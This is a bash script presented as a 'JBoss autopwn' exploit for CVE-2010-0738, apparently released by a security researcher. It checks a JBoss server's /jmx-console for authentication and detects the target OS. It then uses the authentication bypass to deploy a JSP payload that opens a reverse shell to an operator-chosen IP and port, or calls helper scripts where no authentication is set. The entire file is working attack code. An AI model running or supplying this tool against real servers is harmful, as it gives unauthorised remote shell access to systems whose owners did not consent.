#!/bin/bash
if [ -z $1 ]
then
printf "[!] JBoss autopwn with CVE-2010-0738\n[!] Usage: $0 server port\n"
printf "[!] Christian Papathanasiou [email protected]\n[!] Trustwave SpiderLabs\n"
else

printf "[x] Checking if authentication is enabled..\n"
I=`printf "GET /jmx-console/ HTTP/1.0\n\n" | nc $1 $2 | grep -i authentication`

if [ -z "$I" ]
then
printf "[x] Authentication not enabled!\n"

serverinfo=`lynx --dump http://$1:$2/jmx-console/HtmlAdaptor?action=inspectMBean\&name=jboss.system:type=ServerInfo | grep -i osname`

windows=`echo $serverinfo | grep -i windows`;
if [ -z "$windows" ] 
then 
printf "[x] Detected a non-windows target\n"
./e.sh $1 $2 2>/dev/null
else 
printf "[x] Detected a Windows target\n"
./e2.sh $1 $2 2>/dev/null 
fi

else
printf "[!] Authentication enabled!\n"
printf "[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass\n"
printf "[!] Is this a *nix based or Windows based JBoss instance? "
read instance
printf "[!] Which IP should I send the reverse shell to? "
read ip
printf "[!] Which port should I send the reverse shell to? "
read port
if [ $instance == "nix" ]
then
printf "[x] *nix based selected...\n"
J=`cat cve-2010-0738-linux | sed -e "s/MYIP/$ip/g" | sed -e "s/hostx/$1/g" | sed -e "s/portx/$2/g" | sed -e "s/REV-PORT/$port/g" | nc $1 $2 | grep -i "200 OK"`
if [ -z "$J" ]
then 
printf "[!] exploitation failed..likely not vulnerable to auth bypass\n"
else
printf "HEAD /jmx-console/hax0r3.jsp HTTP/1.0\n\n" | nc $1 $2 1>/dev/null 2>/dev/null 
printf "[!] you should now have a shell on $ip:$port\n"
fi

else
printf "[x] Windows based selected..\n"
J=`cat cve-2010-0738-win | sed -e "s/MYIP/$ip/g" | sed -e "s/hostx/$1/g" | sed -e "s/portx/$2/g" | sed -e "s/REV-PORT/$port/g" | nc $1 $2 | grep -i "200 OK"`
if [ -z "$J" ]
then 
printf "[!] exploitation failed..likely not vulnerable to auth bypass\n"
else 
printf "HEAD /jmx-console/hax0rwin.jsp HTTP/1.0\n\n" | nc $1 $2 1>/dev/null 2>/dev/null
printf "[!] you should now have a shell on $ip:$port\n"
fi
fi







fi

fi